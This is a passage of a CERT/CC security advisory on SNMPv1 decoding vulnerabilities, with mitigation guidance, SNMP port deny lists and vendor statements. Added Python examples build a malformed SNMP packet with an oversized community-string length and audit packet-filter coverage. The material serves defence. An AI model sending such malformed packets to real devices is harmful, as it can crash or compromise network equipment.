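def is_safe(packet):
    """True when the outer message structure decodes cleanly."""
    try:
        decode_snmpv1_header(packet)
        return True
    except MalformedSnmp:
        return False


def encode_tlv(tag, value):
    """Minimal BER encoder used only to build the constructed sample packets."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    lb = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


# Constructed well-formed GetRequest for sysDescr.0 with community "public".
SYS_DESCR_0 = bytes([0x2B, 6, 1, 2, 1, 1, 1, 0])
VARBIND = encode_tlv(SEQUENCE, encode_tlv(OID, SYS_DESCR_0) + encode_tlv(NULL_T, b""))
GET_PDU = encode_tlv(GET_REQUEST,
                     encode_tlv(INTEGER, b"\x01")      # request-id
                     + encode_tlv(INTEGER, b"\x00")    # error-status
                     + encode_tlv(INTEGER, b"\x00")    # error-index
                     + encode_tlv(SEQUENCE, VARBIND))  # VarBindList
GOOD_PACKET = encode_tlv(SEQUENCE, encode_tlv(INTEGER, b"\x00")
                         + encode_tlv(OCTET_STRING, b"public") + GET_PDU)

# Same datagram with the community-string length byte rewritten to 0x7F (127):
# it now claims more bytes than the datagram holds, the pattern behind the
# decoding bugs the advisory describes. Constructed for this example.
_bad = bytearray(GOOD_PACKET)
_bad[GOOD_PACKET.index(b"\x04\x06public") + 1] = 0x7F
BAD_PACKET = bytes(_bad)
```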
These vulnerabilities have been assigned the CVE identifiers CAN-2002-0012 and CAN-2002-0013, respectively.

II. Impact

These vulnerabilities may cause denial-of-service conditions, service interruptions, and in some cases may allow an attacker to gain access to the affected device. Specific impacts will vary from product to product.

III. Solution

Note that many of the mitigation steps recommended below may have significant impact on your everyday network operations and/or network architecture. Ensure that any changes made based on the following recommendations will not unacceptably affect your ongoing network operations capability.

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. Please consult this appendix to determine if you need to contact your vendor directly.

Disable the SNMP service

As a general rule, the CERT/CC recommends disabling any service or capability that is not explicitly required, including SNMP. Unfortunately, some of the affected products exhibited unexpected behavior or denial of service conditions when exposed to the OUSPG test suite even if SNMP was not enabled. In these cases, disabling SNMP should be used in conjunction with the filtering practices listed below to provide additional protection.

Ingress filtering

As a temporary measure, it may be possible to limit the scope of these vulnerabilities by blocking access to SNMP services at the network perimeter. Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound traffic from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound traffic to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services.
For SNMP, ingress filtering of the following ports can prevent attackers outside of your network from impacting vulnerable devices in the local network that are not explicitly authorized to provide public SNMP services.

    snmp              161/udp    # Simple Network Management Protocol (SNMP)
    snmp              162/udp    # SNMP system management messages

The following services are less common, but may be used on some affected products

    snmp              161/tcp    # Simple Network Management Protocol (SNMP)
    snmp              162/tcp    # SNMP system management messages
    smux              199/tcp    # SNMP Unix Multiplexer
    smux              199/udp    # SNMP Unix Multiplexer
    synoptics-relay   391/tcp    # SynOptics SNMP Relay Port
    synoptics-relay   391/udp    # SynOptics SNMP Relay Port
    agentx            705/tcp    # AgentX
    snmp-tcp-port     1993/tcp   # cisco SNMP TCP port
    snmp-tcp-port     1993/udp   # cisco SNMP TCP port

As noted above, you should carefully consider the impact of blocking services that you may be using.

It is important to note that in many SNMP implementations, the SNMP daemon may bind to all IP interfaces on the device. This has important consequences when considering appropriate packet filtering measures required to protect an SNMP-enabled device. For example, even if a device disallows SNMP packets directed to the IP addresses of its normal network interfaces, it may still be possible to exploit these vulnerabilities on that device through the use of packets directed at the following IP addresses:

* "all-ones" broadcast address
* subnet broadcast address
* any internal loopback addresses (commonly used in routers for management purposes, not to be confused with the IP stack loopback address 127.0.0.1)

Careful consideration should be given to addresses of the types mentioned above by sites planning for packet filtering as part of their mitigation strategy for these vulnerabilities.
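An added example (not from the advisory) of the caveat just described: given a device's interface addresses and internal management loopbacks, it enumerates every destination a daemon bound to all interfaces will answer on, including the all-ones and subnet broadcasts, and reports which destination/port pairs from the port list above a deny list still leaves open. The interface addresses and the rule format are constructed for this example.

```python
"""Which destinations reach an SNMP daemon bound to every interface, and
what a packet filter still leaves open (added example, not from the advisory).

Interface addresses and the rule format are constructed for this example.
"""
import ipaddress

# The advisory's port list for ingress filtering.
SNMP_PORTS = {(161, "udp"), (162, "udp"), (161, "tcp"), (162, "tcp"),
              (199, "tcp"), (199, "udp"), (391, "tcp"), (391, "udp"),
              (705, "tcp"), (1993, "tcp"), (1993, "udp")}

# Constructed device: two LAN interfaces and a router-style management loopback
# (not the IP stack's 127.0.0.1).
INTERFACES = ["192.0.2.10/24", "198.51.100.5/28"]
MGMT_LOOPBACKS = ["10.255.0.1/32"]


def reachable_destinations(interfaces, loopbacks):
    """Every destination address a daemon bound to all interfaces answers on."""
    dests = set()
    for cidr in interfaces:
        iface = ipaddress.ip_interface(cidr)
        dests.add(iface.ip)                                # the obvious one
        dests.add(iface.network.broadcast_address)         # subnet broadcast
    for cidr in loopbacks:
        dests.add(ipaddress.ip_interface(cidr).ip)         # internal loopback
    dests.add(ipaddress.ip_address("255.255.255.255"))     # "all-ones" broadcast
    return dests


def deny_rules(networks, ports):
    """Build one deny rule (a dict) per network/port/proto combination."""
    return [{"dst": ipaddress.ip_network(n), "port": p, "proto": proto}
            for n in networks for p, proto in ports]


def uncovered(rules, interfaces, loopbacks):
    """Return the (destination, port, proto) triples that no deny rule matches."""
    gaps = set()
    for dst in reachable_destinations(interfaces, loopbacks):
        for port, proto in SNMP_PORTS:
            if not any(r["port"] == port and r["proto"] == proto and dst in r["dst"]
                       for r in rules):
                gaps.add((str(dst), port, proto))
    return gaps


# Filter that only covers the interfaces' own addresses and the two common ports.
NAIVE_RULES = deny_rules(["192.0.2.10/32", "198.51.100.5/32"],
                         {(161, "udp"), (162, "udp")})

# Filter that covers the whole subnets, the all-ones broadcast, the management
# loopback and every port in the advisory's list.
FULL_RULES = deny_rules(["192.0.2.0/24", "198.51.100.0/28",
                         "255.255.255.255/32", "10.255.0.1/32"], SNMP_PORTS)

if __name__ == "__main__":
    for name, rules in (("naive", NAIVE_RULES), ("full", FULL_RULES)):
        gaps = uncovered(rules, INTERFACES, MGMT_LOOPBACKS)
        print("%s: %d uncovered destination/port pairs" % (name, len(gaps)))
        for dst, port, proto in sorted(gaps)[:5]:
            print("   ", dst, port, proto)
```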
Finally, sites may wish to block access to the following RPC services related to SNMP (listed as name, program ID, alternate names)

    snmp        100122    na.snmp snmp-cmc snmp-synoptics snmp-unisys snmp-utk
    snmpv2      100138    na.snmpv2    # SNM Version 2.2.2
    snmpXdmid   100249

Please note that this workaround may not protect vulnerable devices from internal attacks.

Filter SNMP traffic from non-authorized internal hosts

In many networks, only a limited number of network management systems need to originate SNMP request messages. Therefore, it may be possible to configure the SNMP agent systems (or the network devices in between the management and agent systems) to disallow request messages from non-authorized systems. This can reduce, but not wholly eliminate, the risk from internal attacks. However, it may have detrimental effects on network performance due to the increased load imposed by the filtering, so careful consideration is required before implementation. Similar caveats to the previous workaround regarding broadcast and loopback addresses apply.

Change default community strings

Most SNMP-enabled products ship with default community strings of "public" for read-only access and "private" for read-write access. As with any known default access control mechanism, the CERT/CC recommends that network administrators change these community strings to something of their own choosing. However, even when community strings are changed from their defaults, they will still be passed in plaintext and are therefore subject to packet sniffing attacks. SNMPv3 offers additional capabilities to ensure authentication and privacy as described in RFC2574.

Because many of the vulnerabilities identified in this advisory occur before the community strings are evaluated, it is important to note that performing this step alone is not sufficient to mitigate the impact of these vulnerabilities. Nonetheless, it should be performed as part of good security practice.
Segregate SNMP traffic onto a separate management network

In situations where blocking or disabling SNMP is not possible, exposure to these vulnerabilities may be limited by restricting all SNMP access to separate, isolated management networks that are not publicly accessible. Although this would ideally involve physically separate networks, that kind of separation is probably not feasible in most environments. Mechanisms such as virtual LANs (VLANs) may be used to help segregate traffic on the same physical network. Note that VLANs may not strictly prevent an attacker from exploiting these vulnerabilities, but they may make it more difficult to initiate the attacks.

Another option is for sites to restrict SNMP traffic to separate virtual private networks (VPNs), which employ cryptographically strong authentication. Note that these solutions may require extensive changes to a site's network architecture.

Egress filtering

Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound traffic to the Internet. In the case of SNMP vulnerabilities, employing egress filtering on the ports listed above at your network border can prevent your network from being used as a source for attacks on other sites.

Disable stack execution

Disabling executable stacks (on systems where this is configurable) can reduce the risk of "stack smashing" attacks based on these vulnerabilities. Although this does not provide 100 percent protection against exploitation of these vulnerabilities, it makes the likelihood of a successful exploit much smaller. On many UNIX systems, executable stacks can be disabled by adding the following lines to /etc/system:

    set noexec_user_stack = 1
    set noexec_user_stack_log = 1

Note that this may go against the SPARC and Intel ABIs and can be bypassed as required in programs with mprotect(2).
For the changes to take effect you will then need to reboot. Other operating systems and architectures also support the disabling of executable stacks either through native configuration parameters or via third-party software. Consult your vendor(s) for additional information. Share tools and techniques Because dealing with these vulnerabilities to systems and networks is so complex, the CERT/CC will provide a forum where administrators can share ideas and techniques that can be used to develop proper defenses. We have created an unmoderated mailing list for system and network administrators to discuss helpful techniques and tools. You can subscribe to the mailing list by sending an email message to majordomo@cert.org. In the body of the message, type subscribe snmp-forum After you receive the confirmation message, follow the instructions in the message to complete the subscription process. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. AdventNet This is in reference to your notification regarding [VU#107186 and VU#854306] and OUSPG#0100. AdventNet Inc. has reproduced this behavior in their products and coded a Service Pack fix which is currently in regression testing in AdventNet Inc.'s Q.A. organization. The release of AdventNet Inc's. Service Pack correcting the behavior outlined in VU#617947, and OUSPG#0100 is scheduled to be generally available to all of AdventNet Inc.'s customers by February 20, 2002. Avaya Avaya Inc. acknowledges the potential of SNMP vulnerabilities and is currently investigating whether these vulnerabilities impact Avaya's products or solutions. No further information is available at this time. CacheFlow The purpose of this email is to advise you that CacheFlow Inc. 
has provided a software update. Please be advised that updated versions of the software are now available for all supported CacheFlow hardware platforms, and may be obtained by CacheFlow customers at the following URL: http://download.cacheflow.com/ The specific reference to the software update is contained within the Release Notes for CacheOS Versions 3.1.22 Release ID 17146, 4.0.15 Release ID 17148, 4.1.02 Release ID 17144 and 4.0.15 Release ID 17149. RELEASE NOTES FOR CACHEFLOW SERVER ACCELERATOR PRODUCTS: * http://download.cacheflow.com/release/SA/4.0.15/relnotes.htm RELEASE NOTES FOR CACHEFLOW CONTENT ACCELERATOR PRODUCTS: * http://download.cacheflow.com/release/CA/3.1.22/relnotes.htm * http://download.cacheflow.com/release/CA/4.0.15/relnotes.htm * http://download.cacheflow.com/release/CA/4.1.02/relnotes.htm * SR 1-1647517, VI 13045: This update modified a potential vulnerability by using an SNMP test tools exploit. 3Com Corporation A vulnerability to an SNMP packet with an invalid length community string has been resolved in the following products. Customers concerned about this weakness should ensure that they upgrade to the following agent versions: PS Hub 40 2.16 is due Feb 2002 PS Hub 50 2.16 is due Feb 2002 Dual Speed Hub 2.16 is due Jan 2002 Switch 1100/3300 2.68 is available now Switch 4400 2.02 is available now Switch 4900 2.04 is available now WebCache1000/3000 2.00 is due Jan 2002 Caldera Caldera International, Inc. has reproduced faulty behavior in Caldera SCO OpenServer 5, Caldera UnixWare 7, and Caldera Open UNIX 8. We have coded a software fix for supported versions of Caldera UnixWare 7 and Caldera Open UNIX 8 that will be available from our support site at http://stage.caldera.com/support/security immediately following the publication of this CERT announcement. A fix for supported versions of OpenServer 5 will be available at a later date. 
Cisco Systems Cisco Systems is addressing the vulnerabilities identified by VU#854306 and VU#107186 across its entire product line. Cisco will publish a security advisory with further details at http://www.cisco.com/go/psirt/. Compaq Computer Corporation x-ref: SSRT0779U SNMP At the time of writing this document, COMPAQ continues to evaluate this potential problem and when new versions of SNMP are available, COMPAQ will implement solutions based on the new code. Compaq will provide notice of any new patches as a result of that effort through standard patch notification procedures and be available from your normal Compaq Services support channel. Computer Associates Computer Associates has confirmed Unicenter vulnerability to the SNMP advisory identified by CERT notification reference [VU#107186 & VU#854306] and OUSPG#0100. We have produced corrective maintenance to address these vulnerabilities, which is in the process of publication for all applicable releases / platforms and will be offered through the CA Support site. Please contact our Technical Support organization for information regarding availability / applicability for your specific configuration(s). COMTEK Services, Inc. NMServer for AS/400 is not an SNMP master and is therefore not vulnerable. However this product requires the use of the AS/400 SNMP master agent supplied by IBM. Please refer to IBM for statements of vulnerabilities for the AS/400 SNMP master agent. NMServer for OpenVMS has been tested and has shown to be vulnerable. COMTEK Services is preparing a new release of this product (version 3.5) which will contain a fix for this problem. This new release is scheduled to be available in February 2002. Contact COMTEK Services for further information. NMServer for VOS has not as yet been tested; vulnerability of this agent is unknown. Contact for further information on the testing schedule of the VOS product. 
Covalent Technologies Covalent Technologies ERS (Enterprise Ready Server), Secure Server, and Conductor SNMP module are not vulnerable according to testing performed in accordance with CERT recommendations. Security information for Covalent products can be found at www.covalent.net Dartware, LLC Dartware, LLC (www.dartware.com) supplies two products that use SNMPv1 in a manager role, InterMapper and SNMP Watcher. These products are not vulnerable to the SNMP vulnerability described in [VU#854306 and VU#107186]. This statement applies to all present and past versions of these two software packages. DMH Software DMH Software is in the process of evaluating and attempting to reproduce this behavior. It is unclear at this point if our snmp-agent is sensitive to the tests described above. If any problems will be discovered, DMH Software will code a software fix. The release of DMH Software OS correcting the behavior outlined in VU#854306, VU#107186, and OUSPG#0100 will be generally available to all of DMH Software's customers as soon as possible. EnGarde Secure Linux EnGarde Secure Linux did not ship any SNMP packages in version 1.0.1 of our distribution, so we are not vulnerable to either bug. FreeBSD FreeBSD does not include any SNMP software by default, and so is not vulnerable. However, the FreeBSD Ports Collection contains the UCD-SNMP / NET-SNMP package. Package versions prior to ucd-snmp-4.2.3 are vulnerable. The upcoming FreeBSD 4.5 release will ship the corrected version of the UCD-SNMP / NET-SNMP package. In addition, the corrected version of the packages is available from the FreeBSD mirrors. FreeBSD has issued the following FreeBSD Security Advisory regarding the UCD-SNMP / NET-SNMP package: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:09. snmp.asc. 
Hewlett-Packard Company SUMMARY - known vulnerable: ======================================== hp procurve switch 2524 NNM (Network Node Manager) JetDirect Firmware (Older versions only) HP-UX Systems running snmpd or OPENVIEW MC/ServiceGuard EMS Still under investigation: SNMP/iX (MPE/iX) ======================================== _________________________________________________________ --------------------------------------------------------- hp procurve switch 2524 --------------------------------------------------------- hp procurve switch 2525 (product J4813A) is vulnerable to some issues, patches in process. Watch for the associated HP Security Bulletin. --------------------------------------------------------- NNM (Network Node Manager) --------------------------------------------------------- Some problems were found in NNM product were related to trap handling. Patches in process. Watch for the associated HP Security Bulletin. --------------------------------------------------------- JetDirect Firmware (Older versions only) --------------------------------------------------------- ONLY some older versions of JetDirect Firmware are vulnerable to some of the issues. The older firmware can be upgraded in most cases, see list below. JetDirect Firmware Version State ========================== ===== X.08.32 and higher NOT Vulnerable X.21.00 and higher NOT Vulnerable JetDirect Product Numbers that can be freely upgraded to X.08.32 or X.21.00 or higher firmware. EIO (Peripherals Laserjet 4000, 5000, 8000, etc...) J3110A 10T J3111A 10T/10B2/LocalTalk J3112A Token Ring (discontinued) J3113A 10/100 (discontinued) J4169A 10/100 J4167A Token Ring MIO (Peripherals LaserJet 4, 4si, 5si, etc...) 
J2550A/B 10T (discontinued)
J2552A/B 10T/10Base2/LocalTalk (discontinued)
J2555A/B Token Ring (discontinued)
J4100A 10/100
J4105A Token Ring
J4106A 10T

External Print Servers
J2591A EX+ (discontinued)
J2593A EX+3 10T/10B2 (discontinued)
J2594A EX+3 Token Ring (discontinued)
J3263A 300X 10/100
J3264A 500X Token Ring
J3265A 500X 10/100

----------------------------------------------------------
HP-UX Systems running snmpd or OPENVIEW
----------------------------------------------------------

The following patches are available now:

PHSS_26137 s700_800 10.20 OV EMANATE14.2 Agent Consolidated Patch
PHSS_26138 s700_800 11.X OV EMANATE14.2 Agent Consolidated Patch
PSOV_03087 EMANATE Release 14.2 Solaris 2.X Agent Consolidated Patch

All three patches are available from:
http://support.openview.hp.com/cpe/patches/

In addition, PHSS_26137 and PHSS_26138 will soon be available from:
http://itrc.hp.com

================================================================
NOTE: The patches are labeled OV (OpenView). However, the patches are also applicable to systems that are not running OpenView.
================================================================

Any HP-UX 10.X or 11.X system running snmpd or snmpdm is vulnerable. To determine if your HP-UX system has snmpd or snmpdm installed:

    swlist -l file | grep snmpd

If a patch is not available for your platform or you cannot install an available patch, snmpd and snmpdm can be disabled by removing their entries from /etc/services and removing the execute permissions from /usr/sbin/snmpd and /usr/sbin/snmpdm.

----------------------------------------------------------------
Investigation completed, systems vulnerable.
----------------------------------------------------------------
MC/ServiceGuard Event Monitoring System (EMS)

----------------------------------------------------------------
Still under investigation:
----------------------------------------------------------------
SNMP/iX (MPE/iX)

Hirschmann Electronics GmbH & Co. KG

Hirschmann Electronics GmbH & Co. KG supplies a broad range of networking products, some of which are affected by the SNMP vulnerabilities identified by the CERT Coordination Center. The manner in which they are affected, and the actions required to avoid being impacted by exploitation of these vulnerabilities, vary from product to product. Hirschmann customers may contact our Competence Center (phone +49-7127-14-1538, email: ans-support@nt.hirschmann.de) for additional information, especially regarding availability of the latest firmware releases addressing the SNMP vulnerabilities.

IBM Corporation

Based upon the results of running the test suites, we have determined that our version of SNMP shipped with AIX is NOT vulnerable.

Innerdive Solutions, LLC

Innerdive Solutions, LLC has two SNMP-based products:

1. The "SNMP MIB Scout" (http://www.innerdive.com/products/mibscout/)
2. The "Router IP Console" (http://www.innerdive.com/products/ric/)

The "SNMP MIB Scout" is not vulnerable to either bug. The "Router IP Console" releases prior to 3.3.0.407 are vulnerable. The release of "Router IP Console" correcting the behavior outlined in OUSPG#0100 is 3.3.0.407 and is already available on our site. Also, we will notify all our customers about this new release no later than March 5, 2002.

Juniper Networks

This is in reference to your notification regarding CAN-2002-0012 and CAN-2002-0013. Juniper Networks has reproduced this behavior and coded a software fix. The fix will be included in all releases of JUNOS Internet software built after January 5, 2002. Customers with current support contracts can download new software with the fix from Juniper's web site at www.juniper.net.

Note: The behavior described in CAN-2002-0012 and CAN-2002-0013 can only be reproduced in JUNOS Internet software if certain tracing options are enabled. These options are generally not enabled in production routers.

Lantronix, Inc.

Lantronix is committed to resolving security issues with our products.
The SNMP security bug you reported has been fixed in LRS firmware version B1.3/611(020123).

Lotus Development Corporation

Lotus Software evaluated the Lotus Domino Server for vulnerabilities using the test suite materials provided by OUSPG. This problem does not affect default installations of the Domino Server. However, SNMP agents can be installed from the CD to provide SNMP services for the Domino Server (these are located in the /apps/sysmgmt/agents directory). The optional platform-specific master and encapsulator agents included with the Lotus Domino SNMP Agents for HP-UX and Solaris have been found to be vulnerable. For those platforms, customers should upgrade to version R5.0.1a of the Lotus Domino SNMP Agents, available for download from the Lotus Knowledge Base on the IBM Support Web Site (http://www.ibm.com/software/lotus/support/). Please refer to Document #191059, "Lotus Domino SNMP Agents R5.0.1a", also in the Lotus Knowledge Base, for more details.

LOGEC Systems Inc

The products from LOGEC Systems are exposed to SNMP only via HP OpenView. We do not have an implementation of SNMP ourselves. As such, there is nothing in our products that would be an issue with this alert.

Lucent

Lucent is aware of reports that there is a vulnerability in certain implementations of the SNMP (Simple Network Management Protocol) code that is used in data switches and other hardware throughout the telecom industry. As soon as we were notified by CERT, we began assessing our product portfolio and notifying customers with products that might be affected. Our 5ESS switch and most of our optical portfolio were not affected. Our core and edge ATM switches and most of our edge access products are affected, but we have developed, tested, and deployed fixes for many of those products to our customers. Fixes for the rest of the affected product portfolio will be available shortly.
We consider the security and reliability of our customers' networks to be one of our critical measures of success. We take every reasonable measure to ensure their satisfaction. In addition, we are working with customers on ways to further enhance the security they have in place today.

Marconi

Marconi supplies a broad range of telecommunications and related products, some of which are affected by the SNMP vulnerabilities identified here. The manner in which they are affected, and the actions required (if any) to avoid being impacted by exploitation of these vulnerabilities, vary from product to product. Those Marconi customers with support entitlement may contact the appropriate Technical Assistance Center (TAC) for additional information. Those not under support entitlement may contact their sales representative.

Microsoft Corporation

The Microsoft Security Response Center has investigated this issue, and provides the following information.

Summary:

All Microsoft implementations of SNMP v1 are affected by the vulnerability. The SNMP v1 service is not installed or running by default on any version of Windows. A patch is underway to eliminate the vulnerability. In the meantime, we recommend that affected customers disable the SNMP v1 service.

Details:

An SNMP v1 service ships on the CDs for Windows 95, 98, and 98SE. It is not installed or running by default on any of these platforms.

An SNMP v1 service is NOT provided for Windows ME. However, it is possible that Windows 98 machines which had the service installed and were upgraded would still have the service. Since SNMP is not supported for Windows ME, customers in this situation are urged to remove the SNMP service.

An SNMP v1 service is available on Windows NT 4.0 (including Terminal Server Edition) and Windows 2000, but is not installed or running by default on any of these platforms. Windows XP does not ship with an SNMP v1 service.

Remediation:

A patch is underway for the affected platforms, and will be released shortly.
In the meantime, Microsoft recommends that customers who have the SNMP v1 service running disable it to protect their systems. Following are instructions for doing this:

Windows 95, 98 and 98SE:

1. In Control Panel, double-click Network.
2. On the Configuration tab, select Microsoft SNMP Agent from the list of installed components.
3. Click Remove.

Check the following keys and confirm that snmp.exe is not listed:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

For Windows XP:

1. Right-click on My Computer and select Manage.
2. Click on Services and Applications, then on Services.
3. Locate SNMP on the list of services, then select it and click Stop.
4. Select Startup, and click Disabled.
5. Click OK to close the dialog, then close the Computer Management window.

For Windows NT 4.0 (including Terminal Server Edition):

1. Select Start, then Settings.
2. Select Control Panel, then click on the Services icon.
3. Locate SNMP on the list of services, then select it and click Stop.
4. Select Startup, and click Disabled.
5. Click OK to close the dialog, then close Control Panel.

Windows 2000:

1. Right-click on My Computer and select Manage.
2. Click on Services and Applications, then on Services.
3. Locate SNMP on the list of services, then select it and click Stop.
4. Select Startup, and click Disabled.
5. Click OK to close the dialog, then close the Computer Management window.

Multinet

MultiNet and TCPware customers should contact Process Software to check for the availability of patches for this issue. A couple of minor problems were found and fixed, but there is no security risk related to the SNMP code included with either product.

Netaphor

NETAPHOR SOFTWARE INC. is the creator of Cyberons for Java -- SNMP Manager Toolkit and Cyberons for Java -- NMS Application Toolkit, two Java-based products that may be affected by the SNMP vulnerabilities identified here.
The manner in which they are affected, and the actions required (if any) to avoid being impacted by exploitation of these vulnerabilities, may be obtained by contacting Netaphor via email at info@netaphor.com. Customers with annual support may contact support@netaphor.com directly. Those not under support entitlement may contact Netaphor sales: sales@netaphor.com or (949) 470 7955 in the USA.

NetBSD

NetBSD does not ship with any SNMP tools in our 'base' releases. We do provide optional packages which provide various support for SNMP. These packages are not installed by default, nor are they currently provided as an install option by the operating system installation tools. A system administrator/end-user has to manually install these with our package management tools. These SNMP packages include:

+ netsaint-plugin-snmp-1.2.8.4 (SNMP monitoring plug-in for netsaint)
+ p5-Net-SNMP-3.60 (perl5 module for SNMP queries)
+ p5-SNMP-3.1.0 (Perl5 module for interfacing to the UCD SNMP library)
+ p5-SNMP_Session-0.83 (perl5 module providing rudimentary access to remote SNMP agents)
+ ucd-snmp-4.2.1 (Extensible SNMP implementation) (conflicts with ucd-snmp-4.1.2)
+ ucd-snmp-4.1.2 (Extensible SNMP implementation) (conflicts with ucd-snmp-4.2.1)

We do provide a software monitoring mechanism called 'audit-packages', which allows us to highlight if a package with a range of versions has a potential vulnerability, and recommends that the end-user upgrade the packages in question.

Netscape Communications Corporation

Netscape continues to be committed to maintaining a high level of quality in our software and service offerings. Part of this commitment includes prompt response to security issues discovered by organizations such as the CERT Coordination Center. According to a recent CERT/CC advisory, the Oulu University Secure Programming Group (OUSPG) has reported numerous vulnerabilities in multiple vendor SNMPv1 implementations.
These vulnerabilities may allow unauthorized privileged access, denial-of-service attacks, or unstable behavior. We have carefully examined the reported findings, performing the tests suggested by the OUSPG to determine whether Netscape server products were subject to these vulnerabilities. It was determined that several products fell into this category. As a result, we have created fixes which will resolve the issues, and these fixes will appear in future releases of our product line. To Netscape's knowledge, there are no known instances of these vulnerabilities being exploited and no customers have been affected to date. When such security warnings are issued, Netscape has committed to - and will continue to commit to - resolving these issues in a prompt and timely fashion, ensuring that our customers receive products of the highest quality and security.

NET-SNMP

All ucd-snmp versions prior to 4.2.2 are susceptible to this vulnerability, and users of versions prior to 4.2.2 are encouraged to upgrade their software as soon as possible (http://www.net-snmp.org/download/). Versions 4.2.2 and higher are not susceptible.

Network Associates

PGP is not affected, impacted, or otherwise related to this VU#.

Network Computing Technologies

Network Computing Technologies has reviewed the information regarding SNMP vulnerabilities and is currently investigating the impact to our products.

Nokia

This vulnerability is known to affect IPSO versions 3.1.3, 3.3, 3.3.1, 3.4, and 3.4.1. Patches are currently available for versions 3.3, 3.3.1, 3.4 and 3.4.1 for download from the Nokia website. In addition, version 3.4.2 shipped with the patch incorporated, and the necessary fix will be included in all future releases of IPSO. We recommend customers install the patch immediately or follow the recommended precautions below to avoid any potential exploit.
If you are not using SNMP services, including Traps, simply disable the SNMP daemon to completely eliminate the potential vulnerability. If you are using only SNMP Traps and running Check Point FireWall-1, create a firewall policy to disallow incoming SNMP messages on all appropriate interfaces. Traps will continue to work normally.

Nortel Networks

The CERT Coordination Center has issued a broad-based alert to the technology industry, including Nortel Networks, regarding potential security vulnerabilities identified in the Simple Network Management Protocol (SNMP), a common networking standard. The company is working with CERT and other network equipment manufacturers, the U.S. Government, service providers, and software suppliers to assess and address this issue.

Novell

Novell ships SNMP.NLM and SNMPLOG.NLM with NetWare 4.x, NetWare 5.x and 6.0 systems. The SNMP and SNMPLOG vulnerabilities detected on NetWare are fixed and will be available through NetWare 6 Support Pack 1 and NetWare 5.1 Support Pack 4. Support packs are available at http://support.novell.com/tools/csp/

OpenBSD

OpenBSD does not ship SNMP code.

Qualcomm

WorldMail does not support SNMP by default, so customers who run unmodified installations are not vulnerable.

Redback Networks, Inc.

Redback Networks, Inc. has identified that the vulnerability in question affects certain versions of AOS software on the SMS 500, SMS 1800, and SMS 10000 platforms, and is taking the appropriate steps necessary to correct the issue.

Red Hat

Red Hat has released a security advisory at http://www.redhat.com/support/errata/RHSA-2001-163.html with updated versions of the ucd-snmp package for all supported releases and architectures. For more information or to download the update, please visit this page.

SGI

SGI acknowledges the SNMP vulnerabilities reported by CERT and is currently investigating. No further information is available at this time.
For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities are exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods, including the wiretap mailing list on http://www.sgi.com/support/security/.

SNMP Research International

SNMP Research has made the following vendor statement. They are likely to revise and expand the statement as the date for the public vulnerability announcement draws nearer.

The most recent releases (15.3.1.7 and above) of all SNMP Research products address the vulnerabilities identified in the following CERT vulnerability advisories:

VU#854306 (Multiple vulnerabilities in SNMPv1 request handling)
VU#107186 (Multiple vulnerabilities in SNMPv1 trap handling)

All customers who maintain a support contract have received either this release or appropriate patch sets to their 15.3 source code releases addressing these vulnerabilities. Users maintaining earlier releases should update to the current release if they have not already done so. Up-to-date information is available from support@snmp.com.

Stonesoft

Stonesoft's StoneGate product does not include an SNMP agent, and is therefore not vulnerable to this. Other Stonesoft products are still under investigation. As further information becomes available, additional advisories will be available at http://www.stonesoft.com/support/techcenter/

Sun Microsystems, Inc.
Sun's SNMP product, Solstice Enterprise Agents (SEA), described here:

http://www.sun.com/solstice/products/ent.agents/

is affected by VU#854306 but not VU#107186. More specifically, the main agent of SEA, snmpdx(1M), is affected on Solaris 2.6, 7, and 8. Sun is currently generating patches for this issue and will be releasing a Sun Security Bulletin once the patches are available. The bulletin will be available from: http://sunsolve.sun.com/security. Sun patches are available from: http://sunsolve.sun.com/securitypatch.

Symantec Corporation

Symantec Corporation has investigated the SNMP issues identified by the OUSPG test suite and determined that Symantec products are not susceptible to these issues.

TANDBERG

Tandberg have run all the test cases found in the PROTOS test suite, c06snmpv1:

1. c06-snmpv1-trap-enc-pr1.jar
2. c06-snmpv1-treq-app-pr1.jar
3. c06-snmpv1-trap-enc-pr1.jar
4. c06-snmpv1-req-app-pr1.jar

The tests were run with the standard delay time between the requests (100ms), but also with a delay of 1ms. The tests apply to all TANDBERG products (T500, T880, T1000, T2500, T6000 and T8000). The software tested on these products was B4.0 (our latest software), and no problems were found when running the test suite.

Tivoli Systems

Our analysis indicates that this vulnerability does not affect the Tivoli NetView product.

Appendix B. - References

1. http://www.ee.oulu.fi/research/ouspg/protos/
2. http://www.kb.cert.org/vuls/id/854306
3. http://www.kb.cert.org/vuls/id/107186
4. http://www.cert.org/tech_tips/denial_of_service.html
5. http://www.ietf.org/rfc/rfc1067.txt
6. http://www.ietf.org/rfc/rfc1089.txt
7. http://www.ietf.org/rfc/rfc1140.txt
8. http://www.ietf.org/rfc/rfc1155.txt
9. http://www.ietf.org/rfc/rfc1156.txt
10. http://www.ietf.org/rfc/rfc1215.txt
11. http://www.ietf.org/rfc/rfc1270.txt
12. http://www.ietf.org/rfc/rfc1352.txt

Appendix C. - Background Information

Background Information on the OUSPG

OUSPG is an academic research group located at Oulu University in Finland. The purpose of this research group is to test software for vulnerabilities. History has shown that the techniques used by the OUSPG have discovered a large number of previously undetected problems in the products and protocols they have tested.

